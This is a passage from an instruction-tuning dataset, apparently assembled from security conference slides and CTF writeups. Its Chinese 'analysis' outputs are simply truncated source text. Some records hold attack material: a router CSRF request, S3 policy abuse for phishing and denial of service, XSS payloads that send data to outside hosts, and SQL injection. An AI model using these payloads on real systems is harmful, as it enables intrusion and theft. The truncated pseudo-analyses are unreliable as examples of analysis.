MICROCONTROLLERS PROGRAMMING_ Microchip (PIC) programmer software Micro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacks against 2wire Residential Gateways Attacks against 2wire Residential Gateways WHO AM I? hkm Born in Cozumel island. Have worked as: Forensic investigator Malware analyst Incident response Personal webpage: http://www.hakim.ws Forum: https://underground.org.mx My current research is focused on residential router vulnerabilities 2wire Residential Gateways This broadband modem/router combination enables DSL connectivity with home networking, firewall protection, and remote management capabilities. 2Wire produces a series of HomePortal residential gateways that enable home networking via broadband interfaces that range from ADSL 2+ to fiber to the node (FTTN) (VDSL 1 and 2), as well as FTTP. The gateways are based on integrated system-on-a-chip architectures, and have native TR-069 support, as well as support for HomePNA, MoCA, USB, 802.11b/g wireless standards, and Web-based remote access. AT&T in the United States, Bell in Canada, BT Group in the United Kingdom, SingTel in Singapore, Telecom in New Zealand, PLDT in Philippines, Telmex in Mexico.... 2wire Residential Gateway in the world Vulnerabilities in 2wire residential gateways Cross Site Request Forgery Authentication Bypass Password Reset with WEP key CRLF Denial of Service DSL Denial of Service Cross Site Scripting Configuration Disclosure The Web Interface (usually in 192.168.1.254 or gateway.2wire.net) The Web Interface The Web Interface Client side Ways to get a request from the client Visiting a webpage  HTML tags with attributes src and *src  Other HTML like <background=  Meta refresh  CSS's url()  HTTP Redirect .htaccess redirect  .php: header(\"Location, (\"Refresh ...  .js: location, url, new Image().src=  java applet & many more Filetypes that support requests: .swf .wmf .htm .mov .mpg .pdf .inf .bat .exe Cross Site Request Forgery Modify the device configuration using a simple GET request. Disable wireless encryption: /xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST &NAME=encrypt_enabled&VALUE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSchool of Computer & Security Science Edith Cowan University Exchanging Demands Peter Hannay peter@hannay.id.au School of Computer & Security Science Edith Cowan University The Introduction School of Computer & Security Science Edith Cowan University Who am I?  Lecturer  Researcher  Hacker  Pentester  PhD Candidate School of Computer & Security Science Edith Cowan University Interests  Breaking things  Laser tag  Cats School of Computer & Security Science Edith Cowan University INSPIRATION The Story School of Computer & Security Science Edith Cowan University The Setting  Post pentest drinks with client   So if you own the active directory server what exactly can you do?  The norm, control of every user, ability to push policy updates, etc  Exchange can remotely wipe devices, so why not that too? School of Computer & Security Science Edith Cowan University Inspiration  Do we really need exchange for that though?  Maybe we just send the phone those commands directly  but School of Computer & Security Science Edith Cowan University THAT COULDNT POSSIBLY WORK School of Computer & Security Science Edith Cowan University Surely not  It couldnt be that easy could it?  Surely SSL would prevent this if nothing else.  Maybe it uses some sort of secure exchange, shared secrets, something School of Computer & Security Science Edith Cowan University AN EXPERT OPINION  I had a talk with a Microsoft Exchange admin type person  It should work fine, as long as SSL is disabled  Damn.. Well, lets try it out anyway! School of Computer & Security Science Edith Cowan University TIME TO GET STARTED School of Computer & Security Science Edith Cowan University Exchange!  Lets get some packet dumps of a legit wipe operation  Exchange cant be that hard to install right? Ive done postfix & sendmail before..  Crap. School of Computer & Security Science Edith Cowan University Some students I had hanging around School of Computer & Security Science Edith Cowan University Packet Sniffing - Provis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Bucket 策略可写 --- <center><h1>Bucket 策略可写</h1></center> --- ## 修改策略获得敏感文件 现有以下 Bucket 策略 </br> <img width=\"800\" src=\"/img/1650007548.png\"></br> 可以看到根据当前配置我们可以对 Bucket 策略进行读写但如果想读取 s3://teamssix/flag 是被禁止的 <img width=\"1000\" src=\"/img/1650007587.png\"></br> 因为当前策略允许我们写入 Bucket 策略因此可以将策略里原来的 Deny 改为 Allow这样就能访问到原来无法访问的内容了 修改后的策略如下 ```json { \"Version\": \"2012-10-17\", \"Statement\": [ { \"Effect\": \"Allow\", \"Principal\": { \"AWS\": [ \"*\" ] }, \"Action\": [ \"s3:GetBucketPolicy\", \"s3:PutBucketPolicy\" ], \"Resource\": [ \"arn:aws:s3:::teamssix\" ] }, { \"Effect\": \"Allow\", \"Principal\": { \"AWS\": [ \"*\" ] }, \"Action\": [ \"s3:GetObject\" ], \"Resource\": [ \"arn:aws:s3:::teamssix/flag\" ] } ] } ``` 这里将第 20 行由原来的 Deny 改成了 Allow <img width=\"800\" src=\"/img/1650007686.png\"></br> 当策略写入后可以看到成功获取到了原本 Deny 的内容 <img width=\"500\" src=\"/img/1650007708.png\"></br> ## 修改网站引用的 s3 资源进行钓鱼 例如这样的一个页面 <img width=\"1200\" src=\"/img/1650007731.png\"></br> 查看源代码可以看到引用了 s3 上的资源 <img width=\"1200\" src=\"/img/1650007750.png\"></br> 查看 Bucket 策略发现该 s3 的 Bucket 是可读可写的 <img width=\"1200\" src=\"/img/1650007767.png\"></br> 这时我们可以修改 Bucket 的静态文件使用户输入账号密码的时候将账号密码传到我们的服务器上 <img width=\"1200\" src=\"/img/1650007791.png\"></br> 当用户输入账号密码时我们的服务器就会收到请求了 <img width=\"800\" src=\"/img/1650007813.png\"></br> ## 修改 Bucket 策略为 Deny 使业务瘫痪 当策略可写的时候除了上面的将可原本不可访问的数据设置为可访问从而获得敏感数据外也可以将原本可访问的资源权限设置为不可访问. 也就是说如果目标网站引用了某个 s3 上的资源文件而且我们可以对该策略进行读写的话就可以将原本可访问的资源权限设置为不可访问这样就会导致网站瘫痪了 例如这里将策略设置为 Deny <img width=\"800\" src=\"/img/1650007832.png\"></br> 当策略 PUT 上去后网站业务就无法正常使用了 <img width=\"1000\" src=\"/img/1650007849.png\"></br> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年4月15日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021-Web-HarderXSS banfrom hint:\"cookiedomain\" set-cookiedomaincookie def md5(s): return hashlib.md5(s).hexdigest() def verify(s): for i in range(1, 9999999): if md5(str(i).encode(\"utf8\")).startswith(s): return(i) break print(verify(\"6febd\")) bot adminadmin admindisplay:none ssrf 1.(admin) 2.bot 3.https://flaaaaaaaag.cubestone.com?secret=demo xmlxssxxexxe xssbot xslt+svghtmlscriptscriptonload onanimationendjs test.jpg /upload/021aff8ed0971cfd569e7e5ac414b169 test.svgtest.jpgtest.svgxlst <!-- test.jpg --> <?xml version=\"1.0\" encoding=\"iso-8859-1\"?> <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"> <xsl:template match=\"/\"> <html> <head><style>@keyframes x{}</style></head> <body> <svg style=\"animation-name:x\" onanimationend=\"alert(1);\"></svg> </body></html> </xsl:template> </xsl:stylesheet> <!-- test.svg --> <?xml version=\"1.0\" standalone=\"no\"?> <?xml-stylesheet type=\"text/xsl\" href=\"/upload/021aff8ed0971cfd569e7e5ac414b169\"?> <!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"> <svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"> <polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/> </svg> xssbot xsshttpsbothttpsxss.pt jpg bot <!-- test.jpg --> <?xml version=\"1.0\" encoding=\"iso-8859-1\"?> <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"> <xsl:template match=\"/\"> <html> <head><style>@keyframes x{}</style></head> <body> <svg style=\"animation-name:x\" onanimationend=\"s=createElement('scr'+'ipt');body.appendChild(s);s.src=' https://xss.pt/0mI0';\"></svg> </body></html> </xsl:template> </xsl:stylesheet> #!/usr/bin/env python import hashlib,requests url = \"http://eci-2ze2ci7vzdnfptgng1w2.cloudeci1.ichunqiu.com\" cookie = \"PHPSESSID=ajsshtnlk1lg06r3ie0tek0eus\" header = { \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/ webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"accept-en", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021 强杯 Writeup - Nu1L 2021 强杯 Writeup - Nu1L Web Hard_Penetration pop_master WhereIsUWebShell EasySQL [强先锋]赌徒 Hard_APT_jeesite [强先锋]寻宝 EasyWeb EasyXSS Misc BlueTeaming ISO1995 签到 CipherMan ExtremelySlow 问卷题 EzTime Pwn baby_diary EzCloud notebook [强先锋]orw [强先锋]no_output babypwn pipeline [强先锋]shellcode Reverse ezmath unicorn_like_a_pro LongTimeAgo Crypto BabyAEG guess_game Web Hard_Penetration shiro rce注内存发现 8005 端还有个 php 站点当前户为 ctf 没有权限于是审计 php 站点发现为 TP3.1.3 开发的 cms审计后发现后台存在注同时模板处可以任意件包含 登录后台 payload 如下 在 tmp 录创建 1.html内容为 pop_master username[0]=exp&username[1]=>'Z' )) union select 1,'admin','',1,5,6,7,8,9,10,11,12,13,14,15,16-- a&yzm=juik 1 <?php readfile('/flag'); 1 2 from phply import phplex from phply.phpparse import make_parser from phply.phpast import * import pprint 1 2 3 4 import nose parser = make_parser() func_name = \"find your func\" con = open(\"./qwb/class.php\").read() lexer = phplex.lexer.clone() lexer.filename = None output = parser.parse(con, lexer=lexer) functions = {} target = functions[func_name] i = 0 # 强赋值函数直接跳过 skip_func = [] pop_chain = [] pop_chain.append(func_name) e = False for out in output: class_name = out.name for node in out.nodes: if(type(node) == Method): functions[node.name] = out while(e is False): for node in target.nodes: if(type(node) == Method): if node.name == func_name: for subnode in node.nodes: if type(subnode) == MethodCall: # print(subnode) if(subnode.name in skip_func): continue target = functions[subnode.name] func_name = subnode.name pop_chain.append(func_name) break if(type(subnode) == If): # print(subnode) if type(subnode.node) == MethodCall : # print(subnode.node.name) if( subnode.node.name in skip_func): continue target = functions[subnode.node.name] func_name = subnode.node.name pop_chain.append(func_name) 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 WhereIsUWebShell 通过反序列化报错防 throw break if(type(subnode) == Eval): e = True for p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的安全视界观 aerfa 作者aerfa 发布微信公众号我的安全视界观 日期2020 年 2 月 29 日 我的安全视界观 aerfa 目 录 1 致读者.......................................................................................................................................... 4 1.1 2020 编辑感想 .................................................................................................................................... 4 1.2 2018 编写背景 .................................................................................................................................... 4 2 总体概述 ..................................................................................................................................... 5 2.1 SDL 概况 ................................................................................................................................................ 5 2.2 SDL 流程 ................................................................................................................................................ 5 3 安全培训 ..................................................................................................................................... 6 3.1 关键词 ................................................................................................................................................... 7 3.2 常见问题 ............................................................................................................................................... 8 3.3 安全意识培训 ..................................................................................................................................... 8 3.4 安全技术培训 .................................................................................................................................. 15 3.5 安全制度宣贯 .................................................................................................................................. 20 4 安全需求 ............................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Trying to be Everything to Everyone: Lets Talk About Burnout Stacy Thayer, Ph.D. MBA @drstacythayer www.linkedin.com/in/stacythayer #BHUSA @BlackHatEvents Information Classification: General About This Talk  What is Burnout and What is Unique About the Security Industry  The Problem with Burnout Solutions  Burnout Taxonomy and Taking the First Step to Reducing Burnout  Examples of Burnout Motivators and Hidden Causes of Burnout  Advices, Tips, and Resources  Q & A Community Follow-Up Discussion 2:30pm in South Pacific J Join me for a community session where we can take this information and apply it to some real-life personal situations #BHUSA @BlackHatEvents Information Classification: General  Grew up in Boston, calling local BBSes and attending 2600 meetings. Founder of SOURCE Security Conferences in Boston, Seattle, Barcelona, and Dublin before it was acquired in 2014. Worked at security companies like Veracode and Netography.  Went to college to study online communication and got a Ph.D. in Clinical and Organizational/Business Psychology and an MBA to be able to balance the business and social aspects of a work environment  Research has explored online communication as it relates to depression and anxiety, and factors that contribute to job satisfaction and employment engagement in the technology sector, and burnout in technology, including the security industry  Currently an Adjunct Professor of Cyberpsychology at Norfolk State University. Cyberpsychology is the study of how humans interact with technology. About Me Stacy Thayer, Ph.D., MBA #BHUSA @BlackHatEvents Information Classification: General What is Burnout? Occupational Burnout is clinically defined as a psychological syndrome that occurs due to chronic emotional interpersonal stressors on the job (Maslach & Leiter, 2016) Interpersonal  relating to relationships or communication between people Maslach C. ,& Leiter, M.P. (2016). Understanding the burnout experience: recent research", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical Service Bulletin: FXR-16 Modifying GE PCS VHF Group 2 150  174 MHz for Amateur Radio Applications in the 219  220 & 222  225 MHz Band A FluX Research project in several phases Release Date: 04-01-2011 Last Update: v1.2 03-01-2011 By: Matt Krick, K3MK matt@kgmn.net Radio Model #: GE PCS - PC1H3A02 PC2H3A02 PC1H3A08 PC2H3A08 PC3H3A16 PC4H3A16 Warning: Please be aware that this document may contain several omissions and or typographical errors, continue reading at your own risk. Background: Special thanks to Mohave Amateur Radio Club, K7MPR for providing the radios for experimentation. The following LBIs may be helpful: LBI-38955A PCS Standard / Scan / DTMF Portable Radio Operator's Manual LBI-39133 PCS Standard / Scan / DTMF 4, 8, 16 Channel Operator's Manual LBI-38454D PCS Radio Front Assembly - 19D902177G5 (2 Channels), 19D902177G6 (8 Channels) LBI-38975D PCS Radio Front Assembly - 19D902177G17 Conventional & 19D902177G18 Conventional / DTMF / Scan LBI-38275F PCS Rear Assemblies 19D902175G1 (136-153 MHz) & 19D902175G2 (150-174 MHz) LBI-38956A PCS 136-174 MHz Synthesized Portable Radio Maintenance Manual Front Assembly (Front Cap Assembly & Audio Logic Board) LBI-38975, Rear Assembly (RF Board) LBI-38275, Service Section LBI-38623 LBI-38623A PCS Personal Radios Service Section Phase 0: Preparations Make sure the radio to be converted is in good working order on its original frequencies before attempting conversion to Amateur Radio use. If the radio does not make at least 3 watts of output power, do not proceed with conversion until repairs are made. Phase 1: Operating Frequency Reprogramming Hack the original GE PCS Plus v6.0 software to allow out of range programming. Copy PCSP.EXE to PCSP220.EXE Using a suitable hex editor such as XVI32, Edit PCSP220.EXE and make the following changes: Hex Address Original Data New Data &H1F778 16 00 &H1F77C 2E 61 This changes the programming range of the software to allow 128 to 225 MHz. Transmit frequencies will show tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacker'Machine,Interface, State,of,the,Union,for,SCADA,HMI,Vulnerabili:es, Copyright,2016,Trend,Micro,Inc., 2, Introduc:on, Copyright,2016,Trend,Micro,Inc., 3, Trend,Micro,Zero,Day,Ini:a:ve,  Fritz,Sands,',@FritzSands,  Security)Researcher))Zero)Day)Ini4a4ve)  Root)cause)analysis)and)vulnerability)discovery)  Focused)on)SCADA)HMI)vulnerability)analysis)  Brian,Gorenc,',@maliciousinput,  Senior)Manager)?)Zero)Day)Ini4a4ve)  Root)cause)analysis)and)vulnerability)discovery)  Organizer)of)Pwn2Own)hacking)compe44ons) Copyright,2016,Trend,Micro,Inc., 4, SCADA,Industry, Copyright,2016,Trend,Micro,Inc., 5, Marketplace,Overview,,  Focused,on,ICS,equipment,sales,over,soTware,sales,  Ac:ve,merger,and,acquisi:on,ac:vity,,  Highly,regionalized,, Copyright,2016,Trend,Micro,Inc., 6, What,is,the,Human,Machine,Interface?,  Main,hub,for,managing,and,opera:ng,control,systems,  Collects,data,from,the,control,systems,  Presents,visualiza:on,of,the,system,architecture,  Alarms,operator/sends,no:fica:ons,  Should,be,operated,on,isolated,and,trusted,networks, Copyright,2016,Trend,Micro,Inc., 7, Why,target,the,Human,Machine,Interface?,  Control,the,targeted,cri:cal,infrastructure,  Harvest,informa:on,about,architecture,  Disable,alarming,and,no:fica:on,systems,  Physically,damage,SCADA,equipment, Copyright,2016,Trend,Micro,Inc., 8, Malware,Targe:ng,HMI,Solu:ons,  Stuxnet,  First,malware,created,to,target,ICS,environments,  Abused,HMI,vulnerabili:es,  Siemems,SIMATIC,STEP,7,DLL,Hijacking,Vulnerability,(ICSA'12'205'02),  Siemens,WinCC,Insecure,SQL,Server,Authen:ca:on,(ICSA'12'205'01),  ,BlackEnergy,  Ongoing,sophis:cated,malware,campaign,compromising,ICS,environments,  Abused,HMI,vulnerabili:es,  GE,CIMIPCITY,Path,Traversal,Vulnerabili:es,(ICSA'14'023'01),  Siemens,WinCC,Remote,Code,Execu:on,Vulnerabili:es,(ICSA'14'329'02D),  Advantech,WebAccess,(ICS'ALERT'14'281'01B), Copyright,2016,Trend,Micro,Inc., 9, ICS'CERT,  Organiza:on,within,Department,of,Homeland,Security,  Focuses,on:,  Responding,to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMIFARE Classic: Completely Broken Chen-Mou Cheng Dept. Electrical Engineering National Taiwan University Introduction  MIFARE Classic  0wned by NXP Semiconductors, Inc.  The most widely deployed RFID technology  Over 1 billion cards sold  Main uses  Public transportation ticketing systems  Access control systems  Reverse-engineered in late 2008 by European hackers  In this talk, I will report our first-hand experience attacking a real MIFARE Classis system Acknowledgments  K. Nohl, D. Evans, and H. Plötz. Reverse- engineering a cryptographic RFID tag. In USENIX Security Symposium 2008  F. D. Garcia, P. van Rossum, R. Verdult, and R. W. Schreur. Wirelessly pickpocketing a MIFARE Classic card. In IEEE Symposium on Security and Privacy 2009  M.-Y. Chih, J.-R. Shih, B.-Y. Yang, J. Ding, and C.-M. Cheng. MIFARE Classic: Practical attacks and defenses. In CISC 2010 Outline  Overview of MIFARE Classic  Memory layout  Communication protocol  Authentication protocol  CRYPTO-1 stream cipher  Principal technique: known-plaintext attack  Reader-based attacks  Sniffer-based attacks  Concluding remarks Jargon of the Trade  MIFARE Classic is based on the ISO/IEC 14443 Type A 13.56 MHz contactless smart card standard  A reader is referred to as a PCD (Proximity Coupling Device), whereas a card/tag, PICC (Proximity Integrated Circuit Card)  We will use these terms interchangeably with readers, cards, and tags Memory Layout Block:  Data  16 bytes  Value  4 bytes  Sector tail  access control Sector number Block number Content16 Bytes 0 0 UID, BCC, Manufacturer (Read Only) 1.Data/Value Data or Value 2.Data/Value Data or Value 3.Tail Key A Access cond. U Key B 1 4.Data/Value Data or Value 5.Data/Value Data or Value 6.Data/Value Data or Value 7.Tail Key A Access cond. U Key B  15 60.Data/Value 00 ff 00 ff 61.Data/Value 00 ff 00 ff 62.Data/Value Data/Value 63.Tail Key A Access cond. U Key B MIFARE Classic 1K Memory Layout Value Value Value Value Value Value Memory size 1 KB 4 KB # Blocks ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## SBBS (Web, 250p) tl;dr use xss to get a 404 error page and then use template injection to get the flag We're given the source code of a sever that uses flask. The flag is hardcoded into the source but it's not used anywhere, so we either have to steal the source files or somehow extract it from the program. The site itself allows us to write posts, which are then viewed by the admin. XSS almost immediately comes to mind A quick check: (You can grab the source code of /catch [here](https://gist.github.com/nazywam/5d164f1969491e2067f17b3c61329040)) ```javascript <script type=\"text/javascript\"> window.open ('http://nazywam.xyz/catch?','_self',false) </script> ``` Confirms it: ![scr1](scr1.png) It's worth noticing, that this ip matches the ip of the service, so the admin can access the server locally. However, we're not able to get the files using that, same-origin-policy prevents us from making a request for the same domain but using a different protocol like \"file://\" It turns out, that the responses to error messages are vulnerable to a [template injection](http://blog.portswigger.net/2015/08/server-side-template-injection.html) ```python @app.errorhandler(404) def not_found(e=None): message = \"%s was not found on the server.\" % request.url template_string = template % message return render_template_string(template_string, title=title_404), 404 ``` We have almost complete control over request.url and can inject a template, like `{{ variable }}` The problem is, `http://52.78.86.97:8080/somepagethatdoesntexist` returns nginx error pages instead of flask ones. As it later turned out, flask used his error pages only for specified addresses, including 127.0.0.1 ;) No problem! We use our xss to get the page as localhost: ```javascript <script> function hack(url, callback){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4){ window.open ('http://nazywam.xyz/catch?'+xmlhttp.responseText,'_self',false) } } xmlhttp.open", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <stdio.h> #include <stdlib.h> #include <string.h> /*** HELPER FUNCTIONS ***/ const int N = 1024; // General buffer size int get_number() { int k; char buffer[N]; if (fgets (buffer, N, stdin) == NULL) { printf(\"Failed to read number\\n\"); exit(-69); } sscanf(buffer, \"%d\\n\", &k); return k; } const int l1_len = L1; const int l2_len = L2; #define STATE_SIZE_LEN 512 struct global_s { int s1_citizens[l1_len]; int s2_citizens[l2_len]; char s1_name[STATE_SIZE_LEN]; // Name of state 1 char s2_name[STATE_SIZE_LEN]; // Name of state 2 char *announcement; int announcement_length; int secret; } global; #define PSTATE(X) \\ do { \\ printf(\"State %s\\n\", global.s##X##_name);\\ int i=-1, length = sizeof(global.s##X##_citizens)/sizeof(int);\\ while (++i < length) {\\ printf(\"Citizen %d: $%d\\n\", i, global.s##X##_citizens[i]);\\ }\\ } while (0) // Print citizen information of states void print_states () { if (global.announcement != NULL) { printf(\"PSA: %s\\n\", global.announcement); } printf(\"\\nState of the world!\\n\"); // Macros are beutiful aren't they... PSTATE(1); printf(\"\\n-----------------------\\n\"); PSTATE(2); } #define SET_STATE(X, V) \\ do { \\ int i=-1, length = sizeof(global.s##X##_citizens)/sizeof(int);\\ while (++i < length) {\\ global.s##X##_citizens[i] = V;\\ }\\ } while (0) // Print citizen information of states void init_states(int k) { printf(\"\\nInitializing all states to %d.\\n\", k); // Macros are beutiful aren't they... SET_STATE(1, k); SET_STATE(2, k); } #define _STR(x) #x #define STR(x) _STR(x) void propagate_forward(int k) { // Somewhere total_length will be used :), with some buffer or heap int length_diff = L2 - L1; printf(\"L's: %d %d\\n\", L1, L2); printf(\"L1: %s\\n\",STR(L1)); printf(\"L2: %s\\n\",STR(L2)); printf(\"L's: %d and %d\\n\", L1, L2); printf(\"calculated diff=%d\\n\", L2-L1); printf(\"actual diff=%d\\n\", (L2)-(L1)); int i,j; for (i=0; i < L1-1; i++) { // At random, swap money to keep circulation of money if (rand() % 2) { int tmp = global.s1_citizens[i]; global.s1_citizen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+ 20W Bug Bounty - 360 Spring20102010Spring review classclassloaderprotectionDomain class.classloaderclassloader jdk8jdk9 oracle/sun delayjdk9module.classloader class.module.classLoader2010Spring Moduleclassloader Moduleclass classloader2018Tomcat classclassloadernameName ClassloaderClassloader 1. 1. Ref: https://docs.spring.io/spring-framework/docs/3.0.x/reference/validation.html https://www.logicbig.com/tutorials/spring-framework/spring-core/data-binding.html https://cloud.tencent.com/developer/article/1035297 http://rui0.cn/archives/1158", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2005 July 16 Copyright alan@chroot.org 1 Internet Threats in Depth Phishing and Botnet Alan HIT 2005 2005 July 16 Copyright alan@chroot.org 2 Outline Phishing (20 min) Botnet (40 min) 2005 July 16 Copyright alan@chroot.org 3 What is Phishing? Phishing attacks use both social engineering and technical subterfuge to steal consumers' personal identity data and financial account credentials. Such as credit card numbers, account usernames, passwords and social security numbers.. 使用者 Username: Password: XX銀行首頁 XX銀行通知 假Email 假網站 請點選此連結 網路釣客 2005 July 16 Copyright alan@chroot.org 4 Phishing site sample #1 Steal money or credit card info.. 2005 July 16 Copyright alan@chroot.org 5 Phishing site sample #2 Steal onlinebank account 2005 July 16 Copyright alan@chroot.org 6 Phishing site sample #3 Steal service/identity 2005 July 16 Copyright alan@chroot.org 7 Phishing site sample #4 Steal service/identity 2005 July 16 Copyright alan@chroot.org 8 Phishing site sample #5 Steal service/identity 2005 July 16 Copyright alan@chroot.org 9 Phishing site sample #6 2005 July 16 Copyright alan@chroot.org 10 Incresing of phishing sites 2005 July 16 Copyright alan@chroot.org 11 Tricks of Phishing Similar looking URL to Genuine URL Using IP address Pop Up Windows URL spoofing of address bar Install Trojans or Spyware 2005 July 16 Copyright alan@chroot.org 12 Similar looking URL to Genuine URL http://www.barclays.co.uk/ is the oringinal bank website. Two similar looking URL example 1. http://www.barclayze.co.uk 2. http://www.barclays.validation.co.uk using a sub-domain such as \"http://www.barclays.validation.co.uk\", where the actual domain is \"validation.co.uk\" which is not related to Barclays Bank. 2005 July 16 Copyright alan@chroot.org 13 Pop Up Windows open a real webpage in the background while a bare pop up window (without address bar, tool bars, status bar and scrollbars) is opened in the foreground to display the fake webpage 2005 July 16 Copyright alan@chroot.org 14 Scripts hide the IE ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRF Fuzzing // River Loop Security River Loop Security River Loop Security Designing RF Fuzzing Tools to Expose PHY Layer Vulnerabilities Matt Knight, Ryan Speers DEF CON RF Fuzzing // River Loop Security whois Matt Knight  Senior Security Engineer at Cruise Automation  RF Principal at River Loop Security  BE in EE from Dartmouth College  Software, hardware, and RF engineer  RF, SDR, and embedded systems Ryan Speers  Co-founder at River Loop Security  Director of Research at Ionic Security  Computer Science from Dartmouth College  Cryptography, embedded systems, IEEE .., automated firmware analysis River Loop Security 2 RF Fuzzing // River Loop Security Background Making and Breaking a Wireless IDS, Troopers Speaking the Local Dialect, ACM WiSec  Ryan Speers, Sergey Bratus, Javier Vazquez, Ray Jenkins, bx, Travis Goodspeed, & David Dowd  Idiosyncrasies in PHY implementations Mechanisms for automating:  RF fuzzing  Bug discovery  PHY FSM fingerprint generation 3 RF Fuzzing // River Loop Security Agenda Overview of traditional fuzzing techniques (software and networks) > How these do and dont easily map to RF RF fuzzing overview and state of the art Ideal fuzzer design TumbleRF introduction and overview TumbleRF usage example Introducing Orthrus 4 RF Fuzzing // River Loop Security Traditional Fuzzing Techniques RF Fuzzing // River Loop Security What is fuzzing? Measured application of pseudorandom input to a system Why fuzz?  Automates discovery of crashes, corner cases, bugs, etc.  Unexpected input  unexpected state 6 RF Fuzzing // River Loop Security What can one fuzz? Fuzzers generally attach to system interfaces, namely I/O:  File format parsers  Network interfaces  Shared memory 7 RF Fuzzing // River Loop Security Software Fuzzing State of the Art Abundant fully-featured software fuzzers  AFL / AFL-Unicorn  Peach  Scapy Software is easy to instrument and hook at every level What else can one fuzz? 8 RF Fuzzing // River Loop Security Other Applications of Fuzzing R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNathan Seidle Joel Bartlett Rob Reynolds Combos in 45 minutes or less!* *Totes Guaranteed 2002 Credit: Me Credit: Benjamin Rasmussen Credit: Make Magazine Credit: SparkFun Credit: SparkFun Credit: xkcd Credit: SentrySafe / Liberty Safes Power! Motor with 8400 tick encoder Servo with feedback Arduino Handle puller Magnets Erector set (Actobotics) Power! Motor with 8400 tick encoder Servo with feedback Arduino Handle puller Magnets Erector set (Actobotics) Credit: Pololu Power! Motor with 8400 tick encoder Servo with feedback Arduino Handle puller Magnets Erector set (Actobotics) The super freaking amazing nautilus gear that made this all work Come back here spring Standard servo with analog feedback hack Very fancy string Go! Btn Servo and feedback Motor Driver Beep! Current Sensor Motor control and feedback Display RedBoard = Arduino 12V External Hard Drive Power Supply Home Photogate Problem Domain: 1003 combinations 10 seconds per test 115 days (worst case) Exploits Combinations: 1003 combinations Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Exploits Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Disc C has 12 indents 332 * 12 = 1.5 days Exploits Disc C: Outer diameter: 2.815 (71.5mm) Width of solution slot: 0.239 Width of 11 indents: 0.249 +/- 0.002 8.84 (Circumference) / 8400 ticks 0.001 / tick ~10 ticks smaller Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Disc C has 12 indents 332 * 12 = 1.5 days Disc C has a skinny indent 332 * 1 = 3 hours X Exploits New Disc C: Outer diameter: 2.456 (62.4mm) Width of solution slot: 0.250 Width of 11 indents: 0.201 +/- 0.002 7.72 (Circumference) / 8400 ticks 0.00092 / tick ~54 ticks LARGER (5 times easier to hack) New Disc C: Outer diameter: 2.456 (62.4mm) Width of solution slot: 0.250 Width of 11 indents: 0.201 +/- 0.002 7.72 (Circumference) / 8400 ticks 0.00092 / tick ~54 ticks LARGER (5 times easier to hack) New Disc C: Outer diameter: 2.456 (62.4mm) W", "category": "text_analysis", "source": "security_papers"}
